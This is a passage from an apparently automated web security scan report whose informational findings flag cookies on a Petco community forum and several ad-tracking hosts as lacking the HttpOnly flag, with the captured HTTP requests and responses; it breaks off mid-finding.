Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB030 5/15/2011 9:43:41 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:40 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2372

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget12', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

16.44. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Dog_Discussion_Forum/fd03p00v01d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Dog_Discussion_Forum/fd03p00v01d1?widgetId=PTWidget11&cdsn=878&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:43:41 PM, 65 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:40 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2593

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget11', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

16.45. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Ferret_Discussion_Forum/fd03p00v07d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Ferret_Discussion_Forum/fd03p00v07d1?widgetId=PTWidget15&cdsn=475&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:43:41 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:40 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2362

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget15', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

16.46. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Fish_Discussion_Forum/fd03p00v03d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget13&cdsn=635&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:43:41 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:40 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2495

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget13', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

16.47. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Reptile_Discussion_Forum/fd03p00v05d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Reptile_Discussion_Forum/fd03p00v05d1?widgetId=PTWidget16&cdsn=842&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:43:42 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:41 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2532

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget16', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

16.48. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1?widgetId=PTWidget14&cdsn=729&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:43:41 PM, 28 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:40 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2525

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget14', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

16.49. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Social_Applications_Polls/fd03p00v00apoll

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Social_Applications_Polls/fd03p00v00apoll?args=tid:LATEST;&widgetId=PTWidget10&cdsn=512&config=mspPolls0001&pttv=2&includeCSS=false&nav=mspPolls HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB030 5/15/2011 9:43:41 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:40 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2844

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget10', "<div class=\"os-widgetpoll\">\r\n\t<div>\r\n\t\t<div class=\"os-widgetpoll\">\r\n\t\t\t<div id=\"PTWidget10_Poll
...[SNIP]...

16.50. http://community.petco.com/n/blogs/blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/n/blogs/blog.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /n/blogs/blog.aspx?webtag=fd03p00v00b1&widgetId=PTWidget9&pttv=2&nav=widget&config=recentBlogPosts0001&includeCSS=false&cdsn=844 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB030 5/15/2011 9:43:29 PM, 2 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:28 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2784

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget9', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentblogposts\">\r\n\t\t\t<div class=
...[SNIP]...

16.51. http://community.petco.com/n/pfx/forum.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/n/pfx/forum.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /n/pfx/forum.aspx?webtag=fd03p00v02d1&widgetId=PTWidget3&pttv=2&nav=widget&config=recentDiscussions0001&includeCSS=false&cdsn=285 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 301 Page has permanently moved
Connection: close
Date: Mon, 16 May 2011 01:43:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Location: /discussions/Cat_Discussion_Forum/fd03p00v02d1?widgetId=PTWidget3&cdsn=285&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Content-Type: text/html

16.52. http://contextweb-match.dotomi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextweb-match.dotomi.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1305508804408333; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: contextweb-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Date: Mon, 16 May 2011 01:20:04 GMT
X-Name: rtb-s08
Set-Cookie: Apache=173.193.214.243.1305508804408333; path=/
Cache-Control: max-age=0, no-store
Content-Length: 0
Connection: close
Content-Type: text/plain

16.53. http://ctix8.cheaptickets.com/dcssufut800000w4l0d2qm89z_3g4o/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ctix8.cheaptickets.com
Path:	/dcssufut800000w4l0d2qm89z_3g4o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNTc0ODY5MDA4LjMwMTUxNTI3AAAAAAABAAAAGcQAAGZ80E3Ae9BNAQAAABQuAABmfNBNwHvQTQAAAAA-; path=/; expires=Thu, 13-May-2021 01:22:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcssufut800000w4l0d2qm89z_3g4o/dcs.gif?&dcsdat=1305508797113&dcssip=www.orbitz.com&dcsuri=/blog/2011/05/cruise-vacations-5-tips-for-your-first-cruise-on-disney-dream/&page=/blog/2011/05/cruise-vacations-5-tips-for-your-first-cruise-on-disney-dream/&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Disney%20cruise%20tips%20|%20Disney%20cruise%20vacation%20|%20Orbitz%20Blog&WT.js=Yes&WT.jv=1.5&WT.bs=1136x902&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-1574869008.30151527&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-1574869008.30151527.1305508797446&hostname=www.orbitz.com&wtEvtSrc=www.orbitz.com/blog/2011/05/cruise-vacations-5-tips-for-your-first-cruise-on-disney-dream/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/blog/2011/05/cruise-vacations-5-tips-for-your-first-cruise-on-disney-dream/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:22:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNTc0ODY5MDA4LjMwMTUxNTI3AAAAAAABAAAAGcQAAGZ80E3Ae9BNAQAAABQuAABmfNBNwHvQTQAAAAA-; path=/; expires=Thu, 13-May-2021 01:22:46 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

16.54. http://cw-m.d.chango.com/m/cw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cw-m.d.chango.com
Path:	/m/cw

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 13 May 2021 01:20:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/44/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3133143063234146036; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=7367907040977902081; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.57. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

